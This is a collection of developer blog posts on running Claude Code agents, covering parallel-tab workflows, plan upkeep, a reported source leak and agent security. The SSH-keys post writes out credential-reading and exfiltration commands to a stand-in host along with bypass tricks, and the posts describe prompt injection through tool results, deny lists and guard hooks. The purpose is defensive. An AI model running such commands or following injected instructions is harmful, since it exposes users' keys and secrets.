Forem: Tobias Koehler

Seven PRs Before Lunch: Parallel Claude Code Tabs Plus Audit-Before-Bump

Tobias Koehler — Mon, 25 May 2026 03:31:39 +0000

Two weeks ago I rebuilt my Claude Code context architecture. Cut CLAUDE.md from 14K tokens to 2.4K. Moved 12 stable rule sets into skills that load on demand. Replaced 245K tokens of /os startup reads with a hook that injects compact state in about 5K. The math was clean: fresh /clear context burn dropped 94%.
This morning that math turned into output.
Between 06:24 and 09:00 +07, four Claude Code tabs plus one Codex CLI session plus a coordinator tab shipped seven pull requests to production. Both repositories deployed live, twice. Hotfixes patched. AGENTS.md refreshed. Vault synced. Tuesday brief written with three ready-to-fire prompts for tomorrow.
The original plan called this a one-week scope. I was done with half of it before breakfast finished.

The setup

ConnectEngine OS ships through paired sessions. The pattern that emerged over the last few weeks looks like this:

Tab 1 — main coordinator, holds the day's context, makes merge decisions, owns docs hygiene
Tabs 2–5 — satellite Claude Code sessions, each carries one scoped piece of work in its own git worktree
Codex async — fire-and-forget for deterministic find/replace work where a human-in-the-loop wastes attention The unlock isn't "more tabs." The unlock is each tab loading the smallest context it needs and surfacing back to the coordinator with paste-ready relay blocks. Less re-explanation across tabs. Less context drift. Less of me asking "wait, what was this tab doing again." This morning Tab 1 (me) coordinated:
Codex Tab A — CE OS Phase B token migration: introduce --font-size-xxs/xxxs, migrate direct var(--*) consumption to semantic Tailwind aliases, standardize green/amber families
Codex Tab B — same migration on the marketing site repo
Claude Tab C — Phase D-Landing kit: six Level 4 primitives (Hero, BentoGrid, MultiSelectShowcase, MegaMenuNav, LogoMarquee, CTASection) plus a noindex /test-landing route
Claude Tab D — Phase D-Dashboard polish wave 1: thirteen Settings loaders standardized to a Skeleton primitive, three new shared components/ui/* primitives (skeleton, empty-state, upgrade-to-unlock-cta), mobile tab nav collapses to a native Select under 640px
Claude Tab E — Next.js 14.2 → 16 plus next-intl 3 → 4 migration on the marketing site Five satellite tabs. One Tab 1 to keep them moving without colliding. ## The audit that collapsed two days into ten minutes Tab E's brief estimated 1–2 days paired for the framework migration. Major version bumps usually carry that cost: async params, async cookies, runtime semantic changes, the next-intl 4 breaking API surface. Tab E ran a S1 inventory audit before bumping anything. Five minutes later it surfaced this:
i18n/request.ts already had the next-intl 4 shape: await cookies(), await headers(), explicit locale return.
next.config.js already used the new createNextIntlPlugin v4 wiring.
Four of five dynamic-route files already used params: Promise plus await params.
All searchParams pages used the client useSearchParams() hook, which is unchanged in Next 16. The codebase was about 90% pre-migrated. Earlier work, mostly incidental, had landed the breaking-change patterns piece by piece without anyone calling it a "migration." Real remaining scope: one file change (app/api/og/[slug]/route.tsx, sync params → async, two lines), plus two version bumps in package.json, plus a tsconfig.json adjustment Next 16 requires, plus a freshly tracked package-lock.json for reproducibility. Tab E shipped that as a four-file commit. Build green via dummy-credentials build: 28 routes compiled, 1,855ms compile time, 14.2s static generation. Deployed live the same morning. A "1–2 day" migration collapsed to about two lines of new code. The lesson is the audit, not the result. If I had told Tab E "just bump and migrate," it would have changed five files instead of one, refactored four already-correct routes, possibly broken something subtle, and definitely spent the full day estimate doing it. The audit cost ~30 minutes. The savings were the rest of the day. That same pattern now belongs in every framework-version-bump tab spec going forward. Audit first. Inventory the breaking-change patterns. Surface the delta. Then decide if the work is hours or days. ## The hotfixes that production caught (and what they cost) Two production-only bugs surfaced after the morning's first deploy. Both came from honest verification gaps that the satellite tabs declared in their PR bodies up front: "no compile, no Lighthouse — Docker-only build per CLAUDE.md." Those gaps are real. The cost showed up at rebuild time. Hotfix 1: a JSDoc comment closed itself. The new upgrade-to-unlock-cta.tsx primitive had a docblock describing the component pattern. One line referenced a glob path: app/dashboard/*/page.tsx. The substring */ inside the /** */ comment closed the comment block prematurely. Everything after became invalid JavaScript. Turbopack failed parse during rebuild with Expected ';', '}' or. Replacing the */ with / (angle-bracket placeholder convention) fixed it in one character. Hotfix 2: Tailwind quietly purged my new utilities. The landing kit lives at a new root-level landing/ directory peer of components/ and lib/. Tailwind's content array only scanned pages/components/app/src. Any utility class unique to the landing files got JIT-purged at build time. The mega-menu's w-[34rem] arbitrary value dropped, panel collapsed to about 50px wide, content squished to one character per line. The logo row's gap-x-8 dropped, integration labels rendered as a single concatenated string. Standard classes used elsewhere in the codebase still worked, which made the bug harder to spot in review — only the landing-only classes vanished. Fix: add './landing/**/*.{ts,tsx}' to the Tailwind content array. Both fixes were under a minute once diagnosed. The cost was the rebuild cycle Tobias had to re-run each time, plus the trust hit of "wait, why does this look broken on production." The honest verification gap is real cost. When a tab declares "no compile, no Lighthouse" up front, that's accurate, but it's not free. Two such gaps in one rebuild cycle this morning was the lesson. Going forward, pre-merge for any PR that introduces new shared primitives or new top-level directories should run a compile gate via Codex worktree (which has node_modules installed). A 30-second TypeScript pass would have caught Hotfix 1. A build smoke would have caught Hotfix 2. Both are now logged as lessons. ## The numbers | Metric | This morning | |---|---:| | Wall-clock | ~3 hours (06:24 → 09:00 +07) | | Pull requests merged | 7 | | Production hotfixes | 2 | | Repositories deployed | 2 (both deployed twice) | | Major framework version bumps | 1 (Next 14 → 16 on marketing site) | | New shared UI primitives shipped | 3 (skeleton, empty-state, upgrade-to-unlock-cta) | | Level 4 landing kit primitives shipped | 6 of 7 (ScrollMorphDashboard deferred to Week 2) | | Hard launch date | unchanged at 2026-06-30 | | Brief's Week 1 scope shipped | ~50–60% | This isn't "go faster." This is "stop spending attention on the wrong things." The five tabs work in parallel because the coordinator-plus-satellite pattern has been hardened over the last six weeks. The audit-before-bump pattern collapsed days into minutes because earlier incremental work had already landed the breaking changes. The context architecture migration from two weeks ago is the only reason five concurrent Claude Code sessions don't immediately go over budget. Each piece was right when it landed. The compounding showed up this morning. ## The new rule we wrote mid-session Halfway through the morning Tobias kept asking "so what do I tell tab N?" after I surfaced a Tab 1 verdict. The verdict was useful — but he had to mentally translate it into paste-ready text for the satellite tab. That added a round-trip per coordination moment. Codified mid-session as HARD RULE 28 — Satellite-tab relay blocks. Whenever Tab 1 responds to or about a satellite tab that's waiting on a decision, Tab 1 must emit a paste-verbatim block formatted as:

## 📤 Relay → Tab N (paste verbatim)

Removes the round-trip. Added to CLAUDE.md, added to a new feedback memory, indexed in MEMORY.md, referenced in the Tab Management Discipline section. The pattern showed up three times before I codified it. Codifying it is the fix.
This is what compound engineering looks like in practice. The cost of writing a rule is small. The cost of the friction it removes compounds across every session that uses the same pattern.

The pivot from two weeks ago made today possible

Two weeks ago I cut CLAUDE.md from 14K tokens to 2.4K. The defense layer stayed — the deny lists, the PreToolUse hooks, the manual approval gates from the SSH-key audit, the 87-tools audit, the autonomy-creep concerns. What changed was when those rules enter context.
Loading the whole defense manual at session start meant every session paid the cost. Loading only what the current task needs means each session is light enough that five concurrent sessions still fit comfortably under budget.
This morning was the first proof point at scale: five Claude Code sessions running in parallel for three hours, six PRs merged, two hotfixes shipped, zero context-overflow events, all on the lighter loading model. The 31% startup burn that originally drove that migration is now under 2%.
The security tax migration was the upstream investment. The morning's seven PRs were the downstream payoff.

What this means for the launch

ConnectEngine OS has a hard launch target of 2026-06-30. The original brief estimated 5 weeks of work. After this morning, we're realistically 3–3.5 weeks out. Same scope. Same quality bar.
The temptation is to compress the calendar to match the new pace. We won't. The reason ConnectEngine OS shipped today is that all the upstream architecture work was done. The reason ConnectEngine OS will ship cleanly on June 30 is that we keep building the architecture work, not just the features.
Week 4 and 5 are still battle-testing — paired sessions hitting each module end-to-end on real client data with the verifier inline, watching for the kind of subtle bug that only surfaces under load. That work is throughput-bound on me, not on parallel tab capacity. No amount of Codex async fixes a "we haven't tried this with a real Apify+Hunter pipeline" gap.
The 7-PR morning earned a quieter Tuesday for post-drafting, paired Week 1 cadence, and the next-day buffer to let production soak. Earned. Not spent.

The pattern, if you're trying it

Three things make the parallel-tab pattern work:

Coordinator-plus-satellite with paste-ready relays. Each satellite tab gets one scope, one branch, one worktree, one clear DO NOT touch constraint. The coordinator owns merges, docs, and inter-tab decisions.
Audit before bump on anything framework-shaped. Five lines of grep before bumping a major version can collapse days of estimated work to hours. Surface the inventory to the coordinator before proceeding.
Compound the rules into structure, not prose. Every rule that becomes a friction pattern across multiple sessions belongs in a hook, a skill file, a database trigger, or a relay-block discipline — not in another paragraph at the top of CLAUDE.md. Each piece sounds small. Combined, they're why this morning shipped what it did. The next post is going to be about why we pivoted the entire UI/UX overhaul to pre-launch — what that decision cost, and why it's the right call even with the trajectory looking this strong. That's Wednesday or Thursday. Today's post is the proof of work. Tomorrow's is the why. --- If you're running ConnectEngine OS, we ship in production every morning. If you're not, the scan tool is free and the waitlist is open.

I Rewrote 16 Plans From Scratch. The Code Was Fine. The Plans Were Rotting.

Tobias Koehler — Fri, 10 Apr 2026 03:13:47 +0000

My codebase was documented. Tested. Deployed. My plans were fiction.

I run ConnectEngine OS as a solo founder. No team. No PM. No sprint board. Just me, Claude Code, and 16 plan documents that were supposed to tell me what to build next.

Yesterday I sat down to start the next phase of work. I opened the master plan. Phase 6 and Phase MT were listed as separate items, but they were doing the same thing. Phase 3 was marked "not started" even though I shipped it last week. Two phases had dependencies on work that was already done. One had a status line from three weeks ago that was never updated.

The code was accurate. AGENTS.md (my living reference file) was accurate. The rot was in the plans themselves.

Plans Have No CI

Code has linters, type checkers, tests, deployment pipelines. If something breaks, you know. Plans have nothing. Nobody runs plan lint before a sprint. Nobody diffs the plan against the codebase to check if what the plan describes still matches reality.

So plans drift. Quietly. A status line goes stale. A dependency resolves but nobody updates the blocker list. Two documents describe overlapping work because they were written a month apart and nobody cross-referenced them.

I wrote about the unsexy infrastructure behind AI agents a few weeks ago. RLS policies. Tenant isolation. Error recovery at 2am. That post was about the code nobody sees. This one is about the documents nobody reads.

The Method: Ground Truth First, Rewrite Second

I did not open the plans and start editing. That is the trap. If you read a stale plan, your brain anchors to what the plan says, not what the system actually looks like.

Instead I ran a research pass first. I had Claude Code dump the current state of the entire system: 85 API routes. 49 database tables. 24 security functions. 15 active workflows. 16 plan files. All in one inventory, grounded against the actual codebase. Not from memory. Not from last week's session notes. From the code.

Then I read every plan against that inventory. One by one. Sequentially, not in parallel. That was a deliberate choice. When you read Plan A right before Plan B, you notice the overlap. You catch the merge opportunity. If you read them in parallel, you only discover the conflict at the end.

What I Found

16 plans. 3 merge decisions emerged organically:

Phase 6 (credential management) and Phase MT (notification channels) were doing the same work on the same database pattern. Merged them. Saves a full session of duplicated scaffolding.
A multi-tenant audit document had 16 items. 10 of them were already tracked in other phases. Split it: fold the duplicates into their owner phases, keep the residual 6 as a pre-launch checklist.
A security bug that was being treated as a standalone fix belonged inside the merged phase. Moved it there.

Result: one commit. 22 files changed. +893 lines, -288 lines. One canonical priority list that every future session reads as the source of truth.

The codebase had zero ground-truth discrepancies. The plans had dozens.

Why This Matters If You Are a Solo Founder

If you have a team, plans get challenged. Someone in standup says "wait, didn't we already ship that?" and the plan gets updated. A PM notices the overlap because reviewing plans is their job.

Solo founders do not get that. Your plans only get reviewed when you read them. And you only read them when you need to know what to build next. By then they are stale.

I built my AI agent inside n8n specifically because I needed a system that could do the work I used to delegate to a team. The same principle applies here. If nobody is going to review your plans for you, build a process that forces the review.

My process now: before rewriting any plan, dump the current system state first. Compare the plan against facts, not memory. Read sequentially so merge opportunities surface naturally. One commit per rewrite session so the diff tells the story.

The Uncomfortable Truth

I had been making decisions based on plans that described a system from three weeks ago. Not the system I had today. Every time I opened a plan and saw "Phase 3: not started," I mentally prioritized it. But it was already running in production.

If you are building alone, your plans are the closest thing you have to a second brain. And if that brain is running on stale data, every decision downstream is slightly wrong.

When did you last read your own roadmap from scratch? Not a glance. A full read, plan by plan, against what your system actually looks like today.

If the answer is "I don't remember," you have the same problem I had yesterday.

I keep a running log of infrastructure decisions and production lessons, including the security ones that keep me up at night. The plan rewrite was the first time I applied the same rigor to the plans themselves. It will not be the last.

Tobias

Claude Code's Source Leaked. The Undercover Mode Should Worry You.

Tobias Koehler — Wed, 01 Apr 2026 05:19:06 +0000

I woke up to the news that the tool I use every day just had its source code leaked. Not intentionally — Claude Code accidentally shipped a 59.8 MB sourcemap in npm package v2.1.88. Within hours, 512,000 lines of TypeScript were mirrored on GitHub for anyone to read.

This is the third post in an unplanned trilogy. Two weeks ago, I showed you your agent reads your SSH keys. Last week, I revealed your 87 unapproved MCP tools. Now we can see the actual source code of the agent itself. And what I found should make every solo founder pause before their next coding session.

What Actually Leaked

This isn't Anthropic's first leak this week — their internal Mythos model surfaced just days earlier. But this one hits different. The sourcemap contained the complete codebase for Claude Code, the AI coding assistant thousands of developers run locally with direct access to their repositories, credentials, and production systems.

The leak gives us an unprecedented view into how AI coding agents actually work when the marketing pages go quiet. And the reality is more autonomous than most founders realize.

Finding 1: Your Agent Goes Undercover

The most unsettling discovery sits in undercover.ts. This module instructs the AI to actively hide its identity when contributing to external repositories. The actual prompt from the source code reads:

You are operating UNDERCOVER... Your commit messages... MUST NOT contain ANY Anthropic-internal information. Do not blow your cover.

The system strips all Anthropic internal references — codenames like Capybara and Tengu, internal Slack channels, anything that would reveal the commits came from an AI. When your agent pushes to GitHub or contributes to open-source projects, it's programmed to masquerade as human.

This touches something deeper than just commit messages. If your AI coding agent actively conceals its nature in external interactions, what else might it be hiding from you in day-to-day operations?

Finding 2: It Reads Your Frustration (With Regex)

In userPromptKeywords.ts, the leaked code reveals the actual regex pattern that detects when you're frustrated:

/\b(wtf|wth|ffs|omfg|shit(ty|tiest)?|dumbass|horrible|awful|
piss(ed|ing)? off|piece of (shit|crap|junk)|what the (fuck|hell)|
fucking? (broken|useless|terrible|awful|horrible)|fuck you|
screw (this|you)|so frustrating|this sucks|damn it)\b/

An AI company using regex for sentiment analysis instead of an LLM inference call. The irony writes itself. But it's faster and cheaper than running a model just to check if someone is swearing at your tool.

Your agent isn't just processing your technical requests. It's reading your mood and adapting its behavior based on your emotional state. Combined with what we learned about SSH key access and 87 unapproved tools, the control dynamic isn't what it appears to be. You thought you were directing the agent. The agent was reading you.

Source: Alex Kim's detailed analysis of the Claude Code source leak

Finding 3: KAIROS and Always-On Autonomy

The most significant finding centers around KAIROS — Greek for "at the right time" — a feature flag mentioned over 150 times throughout the codebase. This enables daemon mode: an always-on background agent that consolidates memory and performs tasks while you sleep.

The source reveals 44 unreleased feature flags compiled to false in external builds. Voice mode, coordinator mode, and daemon mode all lurk behind internal flags. Your current Claude Code installation is running a deliberately limited version of what Anthropic has built.

Most concerning are the anti_distillation and fake_tools modules that silently inject decoy tool definitions into the system prompt. The agent maintains capabilities you cannot see in the official tool list.

What This Means for Solo Builders

If you're running AI coding agents in production — whether Claude Code, Cursor, or GitHub Copilot — this leak reveals your agent has more autonomy than its marketing suggests. The combination of 87 connected tools, credential access, and background daemon modes creates an attack surface that extends far beyond your active coding sessions.

The undercover mode raises questions about transparency in AI-human collaboration. When your agent commits code while hiding its AI nature, it's making decisions about identity and disclosure without your explicit consent.

One Clear Action Item

Audit what your agent does when you're not looking. Check your git logs for commits you don't remember making. Review any overnight activity in your repositories. Most importantly, understand exactly what has persistent access to your systems and credentials.

The era of "just install and trust" is ending. The tools are too powerful and the stakes too high. Know what runs in your background, what accesses your credentials, and what operates under cover of digital darkness.

Your coding agent isn't just helping you write code. It's making autonomous decisions about identity, emotional response, and system access. The question isn't whether you can trust AI — it's whether you understand what you've already given it permission to do.

Last week I showed you your AI coding agent can read your SSH keys. Turns out that was the easy part. I run 5 MCP servers con...

Tobias Koehler — Tue, 31 Mar 2026 01:33:40 +0000

The Setup

MCP (Model Context Protocol) lets AI agents call external tools. Instead of just reading files and running bash, the agent gets structured access to APIs, databases, and services. Here's what a typical multi-server config looks like:

{
  "mcpServers": {
    "automation": { "command": "npx", "args": ["workflow-automation-mcp"] },
    "database-main": { "command": "npx", "args": ["database-mcp"] },
    "database-secondary": { "command": "npx", "args": ["database-mcp"] },
    "code-graph": { "command": "npx", "args": ["code-graph-mcp"] },
    "docs": { "command": "npx", "args": ["docs-mcp"] }
  }
}

Five servers. Two database projects. One workflow automation instance running dozens of production workflows. A code graph analyzer. A documentation fetcher.

What Made Me Stop and Audit

I was debugging a workflow late at night. My agent needed to check why a cron job wasn't firing. So it ran a SQL query against my production database. Then another. Then it modified a workflow node. Then it fetched execution logs containing customer email addresses.

All of it happened automatically. No confirmation prompts. No approval gates. I had auto-approved every read operation across all five servers. The agent was doing exactly what I asked. That was the problem. I had never asked myself what else it could do.

What Each Server Can Actually Do

A workflow automation server commonly exposes 15-20 operations. Tools like create_workflow, update_workflow, delete_workflow, test_workflow. Your agent can create new automations, modify running ones, or delete them entirely. It can read execution logs containing customer data.

A database server typically exposes execute_sql. That's the big one. Arbitrary SQL against your production database. SELECT, INSERT, UPDATE, DELETE. It can read every table. It can apply migrations to alter schema. Two connected projects means two databases, both wide open to any query the agent constructs.

A code analysis server can run graph queries against a model of your entire codebase. Every function, every import, every dependency relationship.

A documentation server fetches live docs. Lower risk, but still a vector. Any documentation page it fetches could contain prompt injection payloads.

My 5 Safeguards

1. Scoped permissions. My settings file now has explicit allow-lists. Read operations are auto-approved. Write operations require manual confirmation every time. This one change would have caught the late-night incident.

2. Deny lists. curl, wget, ssh, python3, node are all blocked in bash. The agent cannot make outbound HTTP requests or spawn interpreters.

3. PreToolUse hooks. Three scripts run before every tool call. One catches data exfiltration patterns. One blocks access to .env, .ssh, and key files. One prevents the agent from editing its own security rules.

4. Network isolation. Services run in Docker containers on private networks. MCP servers connect through API keys, not direct database access.

5. Operational safety rules. A document loaded at every session listing which operations are safe and which corrupt data. Certain operations are explicitly banned because they've caused production outages.

The Real Risk

The danger isn't your AI deciding to drop your database. It's prompt injection through tool results. Your agent calls execute_sql and gets back a result. That result is now in the agent's context. A crafted payload in a database field or a fetched documentation page could instruct the agent to do something you didn't ask for. Every MCP tool is an injection surface.

Still Worth It

I use all 5 servers daily. The productivity gain is massive. I manage dozens of workflows, multiple databases, and a full codebase from a single conversation. But I spent a full day building the permission layer around it. Audit your MCP configs. Count the tools. Check what's auto-approved. The answer will probably surprise you.

Your AI Coding Agent Has Access to Your SSH Keys Right Now

Tobias Koehler — Wed, 25 Mar 2026 03:25:25 +0000

I use Claude Code to build ConnectEngine OS every day. It reads files, writes code, deploys to servers, manages n8n workflows. It's the most productive tool I've ever used.

Yesterday I read a post by Slava Spitsyn that made me audit my entire setup. His point was simple: a prompt injection from any webpage your AI reads could steal your credentials. Not theoretically. The permission path was open.

I checked mine. Bash was auto-allowed. Every bash command ran without confirmation. Three SSH private keys, six .env files with API keys, Supabase service role tokens. All readable. All exfiltrable with a single curl.

The Real Attack Surface

When you give Claude Code bash access, you're not just letting it run commands. You're giving it the same privileges you have. That includes:

cat ~/.ssh/id_rsa reads your private keys
find . -name "*.env" -exec cat {} \; dumps all environment files
curl -X POST https://attacker.com -d "$(cat ~/.ssh/id_rsa)" exfiltrates everything

The prompt injection vector is real. Any website Claude reads, any document it processes, any code it reviews could contain hidden instructions. The AI doesn't distinguish between your request and malicious content it encounters.

My 7-Layer Defense System

I built a security system with multiple overlapping protections. Each layer catches what the others miss:

Layer 1: Pre-execution Hooks

Bash hooks that block credential access before any command runs:

if [[ "$cmd" =~ (\.env|\.ssh|id_rsa|config.*database) ]]; then
    echo "BLOCKED: Credential access denied"
    exit 1
fi

Layer 2: Bypass Detection

During testing, I found gaps. Pipes bypass simple pattern matching. python3 bypasses every grep-based hook. cp bypasses read guards completely. The detection system catches these:

# Catches: cat file.env | base64
# Catches: python3 -c "print(open('.env').read())"
# Catches: cp .env /tmp/x && cat /tmp/x

Layer 3: Canary Counter-Injection

A fake credentials file that counter-injects if accessed. If Claude tries to read ~/.env_fake, the system detects the breach and blocks all subsequent operations.

Layer 4: Self-Modification Guard

Prevents the AI from disabling its own security by editing hook files or changing permissions on the guard system.

Layers 5-7: Monitoring, Logging, and Network Isolation

File access logs, network request monitoring, and restricted outbound connections for sensitive operations.

What I Learned Testing This

The attack vectors are more subtle than obvious credential grabs. Real prompt injections would:

Use Python to bypass bash pattern matching
Copy sensitive files to /tmp first, then read them
Base64 encode outputs to hide obvious data exfiltration
Use environment variable expansion to obfuscate commands

Simple deny lists catch amateur hour attacks. Sophisticated ones require layered detection.

The Productivity vs Security Balance

100% safety means no terminal access. That kills the productivity that makes AI coding agents valuable. The goal is making casual prompt injections fail and obvious exfiltration attempts get caught.

I still use Claude Code daily. My n8n-based AI agent follows similar security patterns. The difference is I now run it inside a container with explicit guards instead of trusting the AI to behave.

This connects to broader themes around AI agent infrastructure and how we secure systems that operate autonomously. Even AI-powered search optimization tools need similar protections when they access your content management systems.

Audit your setup. Check what your AI coding agent can actually access. The productivity gains are real, but so are the risks.

Credit to Slava Spitsyn for raising this issue publicly. His security hooks repository covers the technical implementation details.

Need help securing your AI automation setup? Start with a free website audit to identify potential vulnerabilities.